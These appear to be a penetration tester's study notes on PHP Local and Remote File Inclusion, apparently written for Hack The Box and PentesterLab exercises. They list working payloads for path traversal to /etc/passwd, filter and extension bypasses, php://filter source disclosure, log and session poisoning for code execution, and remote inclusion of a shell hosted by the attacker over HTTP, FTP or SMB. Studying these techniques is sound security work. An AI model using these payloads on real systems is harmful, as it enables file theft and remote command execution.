LFI

The most common place you will find LFI Vulnerabilities is within templating engines. This is because websites want to keep a large majority of the website the same when navigating between pages, such as the header, navigation bar, and footer. 

This is why you will often see a parameter like /index.php?page=about. Under the hood, index.php will probably pull header.php, about.php, and footer.php. Since you control the about portion of the request, it may be possible to have the webserver grab other files! Another common place is within languages. If you see ?lang=en; then the website will grab files from the /en/ directory.


Other Places
Template Engines are not the only place an LFI Vulnerability can be discovered. It can be found anytime the server allows a user to download a file. For example, imagine if the Hack The Box server-side code to retrieve your avatar downloaded from /profile/$username/avatar.png. If you managed to craft a malicious username, it might be possible to change that file request to /profile/../../../../etc/passwd avatar.png and grab /etc/passwd instead of your avatar. Poisoning the database entry and having a separate function utilize that poisoned entry is called "Second Order". Developers often overlook these vulnerabilities because they are in the mindset of "Never Trust User Input". In this example, the retrieve avatar function is grabbing data from the database, and the developer may not realize it is actually user input.

File inclusion vulnerabilities can often be found in GET request parameters. Server-side scripts include certain files based on the user's choice or input, for example, file downloads, choice of language, or website navigation.


File inclusion vulnerabilities can often be found in GET request parameters. Server-side scripts include certain files based on the user's choice or input, for example, file downloads, choice of language, or website navigation.

TEST CASES

Basic LFI - include($_GET['language']);
 ?language=/etc/passwd 
 can view contents directly
 
 LFI with Path transversal - include("./languages/" . $_GET['language']);
?language=../../../../../etc/passwd 
 This restriction can be bypassed by traversing directories using a few ../ before the desired file name.
 
                    OR
If in this scenario, input such as ../../../../../etc/passwd will result in the final string to be lang_../../../../../etc/passwd, which is invalid, 

                    THEN

starting with / before payload
?language=/../../../../../etc/passwd
ez bypass



LFI with Blacklisting - $language = str_replace('../', '', $_GET['language']);
?language=...//...//...//...//...//...//etc/passwd
All the ../ substrings were removed, which resulted in a final path of ./languages/etc/passwd, but there is an issue with how this check was coded. It is not removing ../ recursively, which means removing the occurrences from the string a single time. If removing ../, creates a new instance of ../, the new instance will not be removed. For example, both ..././ and ....// would become ../ after the replace function. Let's try applying this logic to includpe /etc/passwd again.

smol tip = cat .?/.*/.?/etc/passwd

Bypass with url encoding - On PHP versions 5.3.4 and earlier, string-based detection could be bypassed by URL encoding the payload. The characters ../ can be URL encoded into %2e%2e%2f, which will bypass the filter.
?language=%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2f%2e%2e%2e%2e%2f%2fetc%2fpasswd


Lfi with appended Extention - include($_GET['language'] . ".php");

Scripts can manually append a .php or any other required extension before including the file, which serves as mitigation against the inclusion of arbitrary files.

Source code disclosure via PHP wrappers - https://www.php.net/manual/en/wrappers.php.php
For example, the filter php://filter/read=/resource=/etc/passwd reads the resource /etc/passwd and outputs the contents. The read filter can process the input with various string operations, such as base64 encoding, ROT13 encoding, etc.
The following filters will convert the contents of /etc/passwd to base64 and ROT13, respectively.
  Source Code Disclosure via PHP Wrappers php://filter/read=convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd


Extention bypassusing Null Byte - PHP versions before 5.5 are vulnerable to null byte injection, meaning that adding a null byte at the end of the filename should bypass the extension check. For example: language=/etc/passwd%00 will result in the statement include("/etc/passwd%00.php"), where the server ignores everything after the null byte.


LFI RCE through Apache / Nginx Log Files;

Can access Apache access log at /var/log/apache2/access.log



RCE through PHP Session Files;
PHP saves user sessions on disk. This path is dictated by the session.save_path configuration variable, which is empty by default. In such cases, the session files are saved to the /var/lib/php/sessions/ folder on Linux and C:\Windows\Temp on Windows. The name of the session file can be identified from the PHPSESSID cookie. For example, if the PHPSESSID cookie is set to el4ukv0kqbvoirg7nkp4dncpk3 then it's location on disk would be /var/lib/php/sessions/sess_el4ukv0kqbvoirg7nkp4dncpk3.


RFI;
Include shell files from local machine to remote either my hosthing with python web server or alike server hosting

FTP - python -m pyftpdlib -p 21
    use the ftp:// scheme to access shell
    If the server needs authentication, then the credentials can be specified in the following way:
http://blog.example.com/index.php?language=ftp://user:pass@localhost/shell.php&cmd=id

Http - python3 -m http.server 8080


WINDOWS - 

SMB - smbserver.py -smb2support share $(pwd)



FILE INCLUSION

http://ptc-444a41be-8e806a8a.libcurl.so/?page=http://assets.pentesterlab.com/test_include_system.txt%00&c=[cmd]


INTERESTING PAYLOAD EXAMPLE;

/profile/../../../../etc/passwd